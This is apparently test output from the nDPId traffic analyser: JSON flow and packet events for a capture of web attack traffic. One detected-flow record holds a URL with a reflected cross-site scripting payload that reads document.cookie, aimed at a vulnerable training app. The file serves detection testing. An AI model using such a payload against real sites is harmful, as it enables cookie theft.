+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1638,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":114,"flow_packet_id":3,"flow_last_seen":1499347163178,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347163178,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0YKZAAD4GZTKsEAABwKgKMtP8AFCcucZxxlbtDIAQAOXv0wAAAQEICgE5ptUD43hL"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1644,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347164459,"flow_last_seen":1499347164459,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347164459,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54282,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1644,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":115,"flow_packet_id":1,"flow_last_seen":1499347164459,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347164459,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8yU1AAD4G\/IKsEAABwKgKMtQKAFBoaGFbAAAAAKACchAXlgAAAgQFtAQCCAoBOagWAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1645,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":115,"flow_packet_id":2,"flow_last_seen":1499347164459,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347164459,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1ArCPOEyaGhhXKAScSD3lQAAAgQFtAQCCAoD43mMATmoFgEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1646,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":115,"flow_packet_id":3,"flow_last_seen":1499347164460,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347164460,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0yU5AAD4G\/ImsEAABwKgKMtQKAFBoaGFcwjzhM4AQAOWWnQAAAQEICgE5qBYD43mM"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1659,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347165741,"flow_last_seen":1499347165741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347165741,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54296,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1659,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":116,"flow_packet_id":1,"flow_last_seen":1499347165741,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347165741,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8vRVAAD4GCLusEAABwKgKMtQYAFCo9hRDAAAAAKACchAi0gAAAgQFtAQCCAoBOalWAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1660,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":116,"flow_packet_id":2,"flow_last_seen":1499347165741,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347165741,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1BjYjd6VqPYURKAScSDt3QAAAgQFtAQCCAoD43rMATmpVgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1661,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":116,"flow_packet_id":3,"flow_last_seen":1499347165742,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347165742,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0vRZAAD4GCMKsEAABwKgKMtQYAFCo9hRE2I3eloAQAOWM5QAAAQEICgE5qVYD43rM"} 
+01118{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1671,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347163177,"flow_last_seen":1499347167004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499347167004,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54268,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%270XVM4C1CNSWY8VF443GGZ6W527WBY4H29E2XQNGG2QUPQEKW0U%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1678,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347168302,"flow_last_seen":1499347168302,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347168302,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54322,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1678,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":1,"flow_last_seen":1499347168302,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347168302,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8pdZAAD4GH\/qsEAABwKgKMtQyAFAP+Q4AAAAAAKACchC\/eAAAAgQFtAQCCAoBOavWAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1679,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":2,"flow_last_seen":1499347168302,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347168302,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1DJusJVZD\/kOAaAScSA7HQAAAgQFtAQCCAoD431NATmr1gEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1680,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":3,"flow_last_seen":1499347168303,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347168303,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0pddAAD4GIAGsEAABwKgKMtQyAFAP+Q4BbrCVWoAQAOXaIwAAAQEICgE5q9cD431N"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1687,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347169573,"flow_last_seen":1499347169573,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347169573,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54336,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1687,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":118,"flow_packet_id":1,"flow_last_seen":1499347169573,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347169573,"pkt":"ABm5CmnxAMGxFOsxCABFAAA83TtAAD4G6JSsEAABwKgKMtRAAFDvZ3AvAAAAAKACchB8jgAAAgQFtAQCCAoBOa0UAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1688,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":118,"flow_packet_id":2,"flow_last_seen":1499347169574,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347169574,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1EA8SVzP72dwMKAScSBh5gAAAgQFtAQCCAoD436LATmtFAEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1689,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":118,"flow_packet_id":3,"flow_last_seen":1499347169574,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347169574,"pkt":"ABm5CmnxAMGxFOsxCABFAAA03TxAAD4G6JusEAABwKgKMtRAAFDvZ3AwPElc0IAQAOUA7gAAAQEICgE5rRQD436L"} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347035750,"flow_last_seen":1499347041619,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347170842,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52938,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347035750,"flow_last_seen":1499347041619,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347170842,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52938,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347038276,"flow_last_seen":1499347043619,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347170842,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52964,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347038276,"flow_last_seen":1499347043619,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347170842,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52964,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347039587,"flow_last_seen":1499347044619,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347170842,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52978,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347039587,"flow_last_seen":1499347044619,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347170842,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52978,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347042150,"flow_last_seen":1499347047620,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347170842,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53004,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347042150,"flow_last_seen":1499347047620,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347170842,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53004,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347043416,"flow_last_seen":1499347048620,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347170842,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53018,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347043416,"flow_last_seen":1499347048620,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347170842,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53018,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347044676,"flow_last_seen":1499347050622,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347170842,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53032,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347044676,"flow_last_seen":1499347050622,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347170842,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53032,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1708,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347172098,"flow_last_seen":1499347172098,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347172098,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54362,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1708,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":119,"flow_packet_id":1,"flow_last_seen":1499347172098,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347172098,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8dk5AAD4GT4KsEAABwKgKMtRaAFDNItnFAAAAAKACchAyrAAAAgQFtAQCCAoBOa+LAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1709,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":119,"flow_packet_id":2,"flow_last_seen":1499347172098,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347172098,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1FoQ75vBzSLZxqAScSAB9QAAAgQFtAQCCAoD44ECATmviwEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1710,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":119,"flow_packet_id":3,"flow_last_seen":1499347172099,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347172099,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0dk9AAD4GT4msEAABwKgKMtRaAFDNItnGEO+bwoAQAOWg\/AAAAQEICgE5r4sD44EC"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1717,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347173373,"flow_last_seen":1499347173373,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347173373,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54376,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1717,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":1,"flow_last_seen":1499347173373,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347173373,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8XK1AAD4GaSOsEAABwKgKMtRoAFDpcOxnAAAAAKACchACbwAAAgQFtAQCCAoBObDKAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":2,"flow_last_seen":1499347173373,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347173373,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1GhwCsiK6XDsaKAScSBElAAAAgQFtAQCCAoD44JBATmwygEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":3,"flow_last_seen":1499347173374,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347173374,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0XK5AAD4GaSqsEAABwKgKMtRoAFDpcOxocArIi4AQAOXjmwAAAQEICgE5sMoD44JB"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347174667,"flow_last_seen":1499347174667,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347174667,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54390,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":1,"flow_last_seen":1499347174667,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347174667,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8LxxAAD4GlrSsEAABwKgKMtR2AFATHZ0RAAAAAKACchAmyAAAAgQFtAQCCAoBObINAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1733,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":2,"flow_last_seen":1499347174667,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347174667,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1HZkheFBEx2dEqAScSBaeAAAAgQFtAQCCAoD44OEATmyDQEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1734,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":3,"flow_last_seen":1499347174668,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347174668,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Lx1AAD4GlrusEAABwKgKMtR2AFATHZ0SZIXhQoAQAOX5fgAAAQEICgE5sg4D44OE"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1747,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347177248,"flow_last_seen":1499347177248,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347177248,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54416,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1747,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":1,"flow_last_seen":1499347177248,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347177248,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8XzZAAD4GZpqsEAABwKgKMtSQAFC5seulAAAAAKACchAu\/wAAAgQFtAQCCAoBObSTAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1748,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":2,"flow_last_seen":1499347177248,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347177248,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1JDtsXHRubHrpqAScSBGbgAAAgQFtAQCCAoD44YJATm0kwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1749,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":3,"flow_last_seen":1499347177249,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347177249,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0XzdAAD4GZqGsEAABwKgKMtSQAFC5seum7bFx0oAQAOXldQAAAQEICgE5tJMD44YJ"} 